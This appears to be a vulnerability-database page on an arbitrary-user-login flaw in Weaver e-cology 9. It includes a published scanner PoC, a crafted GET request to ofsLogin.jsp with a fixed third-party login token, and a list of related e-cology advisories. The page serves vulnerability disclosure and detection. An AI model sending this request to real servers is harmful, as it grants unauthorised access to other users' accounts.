ecology-ofslogin-aul: 泛微 e-cology 任意用户登录漏洞

漏洞描述

PoC代码[已公开]

id: ecology-ofslogin-aul

info:
  name: 泛微 e-cology 任意用户登录漏洞
  author: Chaitin
  severity: high
  verified: true
  description: |
    泛微e-cology9中存在信息泄露及任意用户登录漏洞，远程攻击者可利用两个漏洞组合任意登录系统中的用户
  reference:
    - https://mp.weixin.qq.com/s/Rhk7DaiL_YgqzaRwahDmjw
  solutions: 泛微e-cology9
  tags: ecology
  created: 2023/06/28

rules:
  r0:
    request:
      method: GET
      path: /mobile/plugin/1/ofsLogin.jsp?syscode=1&timestamp=1&gopage=/wui/index.html&receiver=1&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168
    expression: response.status == 200 && response.body.bcontains(b"location.replace('/wui/index.html');")
expression: r0()

相关漏洞推荐

• ecology-changeuserinfo-info-leak: 泛微 e-cology changeuserinfo 信息泄露 POC

  2025-09-01 | 泛微e-cology
  泛微e-cology9中存在信息泄露及任意用户登录漏洞，远程攻击者可利用两个漏洞组合任意登录系统中的用户

• 泛微e-cology list 前台SQL注入漏洞 无POC

  2025-07-10 15:06:48 | 泛微e-cology
  SQL注入漏洞是指攻击者通过在Web应用程序的输入字段中插入恶意SQL代码，从而绕过应用程序的安全措施，直接对数据库执行非法操作。这种漏洞通常发生在应用程序未对用户输入进行充分验证和过滤的情况下，使得...

• 泛微E-Cology登录绕过漏洞 无POC

  2025-07-08 | 泛微E-Cology
  泛微E-Cology存在登录绕过漏洞，攻击者可以绕过系统的访问控制机制，窃取系统中的敏感信息。

• 泛微e-cology 前台SQL注入漏洞 无POC

  2025-07-09 10:38:06 | 泛微OA
  2025年7月，泛微官方发布v10.76补丁修复了一处 SQL注入漏洞，经分析，攻击者可利用此漏洞获取服务器敏感信息，如结合其他后台漏洞可导致代码执行，最终造成服务器沦陷。

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...